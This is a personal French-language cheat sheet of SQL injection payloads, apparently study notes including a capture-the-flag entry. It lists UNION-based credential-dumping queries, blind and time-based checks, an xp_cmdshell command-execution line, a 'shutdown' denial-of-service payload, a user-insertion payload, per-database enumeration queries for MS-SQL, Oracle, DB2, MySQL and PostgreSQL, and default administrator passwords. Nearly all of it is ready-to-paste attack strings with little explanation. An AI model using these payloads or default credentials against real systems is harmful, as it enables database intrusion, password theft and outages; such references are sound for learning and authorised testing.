resume base de donnée

outils sécuritée, by tanguy schnellbach

Commandes d'injection SQL pour la découverte

Chaîne d'attaque par injection SQL
Query syntax breaking	Single Quote('), Double Quote(")
Injection SQL comment	Hyphens (--),Hash(#),Comment(/*)
Extending/Appending queries	Semicolon (;)
Injecting/Bypassing filter	CHAR()?ASCII(),HEX,CONCAT(),CAST(),CONVERT(),NULL

Commandes d'injection SQL courantes
Injection Union	Union all select NULL (Multipl columns)
Running COmmand	1;exec master...xp_cmdshell 'dir' > C:\inetpub\wwwroot\dir.txt' OR master.dbo.xp_cmdshell
Loading Files	LOAD_FILE(),User UTL_FILE and utfReadfileAsTable
Adding user	1';insert into users values('nto','nto123')
Dos	1';shutdown --
Fetching Fields	select name from syscolumns where id = (select id FROM sysobjects where name = 'target table name') -- (Union can help) Co

Commandes courantes d'injection SQL aveugle
Quick Check	AND 1=1, AND 1=0
User Check	1+AND+USER_NAME()='dbo'
Injecting Wait	1;waitfor+delay+'0:à:10'
Check for sa	SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
Looping/Sleep	BENCHMARK(TIMES,TASK), pg_sleep(10)

par défault Usernames/Password
Oracle	scott/tiger, dbsnmp/dbsnmp>
MySQL	mysql/<BLANK>,root/<BLANK>
PostgreSQL	postgres/<BLANK>
MS-SQL	sa/<BLANK>
DB2	db2admin/db2admin

Commandes d'injection SQL courantes pour les bases de données principales

MS-SQL
Grab version	@@version
Users	name FROM master..syslogins
Tables	name FROM master..sysobjects WHERE xtype = 'U'
Database	name FROM master..sysdatabases;
Columns	name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'élt;TABLENAME')
Running User	DB_NAME()

Oracle
Grab version	table v$version compare with 'Oracle%'
Users	* from dba_users
Tables	table_name from all_tables
Database	distinct owner from all_tables
Columns	column_name from all_tab_columns where table_name='<TABLENAME>
Running User	user from dual

IBM DB2
Grab version	Versionnumber from sysibm.sysversions;
Users	user from sysibm.sysdummy1
Tables	name from sysibm.systables
Database	schemaname from syscat.schemata
Columns	name, tbname, coltype from sysibm.syscolumns
Running User	user from sysibm.sysdummy1

MySQL
Grab version	@@version
Users	* from mysql.user
Tables	table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Database	distinct(db) FROM mysql.db
Columns	table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name == '<TABLENAME>'
Running User	user()

PostgreSQL
Grab version	version()
Users	* from pg_user
Database	datname FROM pg_database
Running User	user;

injection SQL
permet d'injecter dans un site une commande SQL
' '--	inserer entre le debut de la demande et la fin (le serveur rajouteras une <'> la commande souhaitée exemple : ' OR '1'=1
recupere quand on connais les nom des tables	'and '1'='0' union select null,concat(first_name,0x0a,last_name,user,0x3a,password) from users
connaitre la version mysql	'and '1'='0' union select null, version()#
afficher les tables	'AND 1=2 UNION SELECT CONCAT(table_schema,0x0a,table_name),null,null,null,null FROM information_schema.tables#
afficher les tables	'AND 1=2 UNION SELECT CONCAT(COLUMN_NAME),null,null,null,null FROM INFORMATION_SCHEMA.COLUMNS#
FCSC 2021 intro	" -1 OR 1=1 LIMIT 1;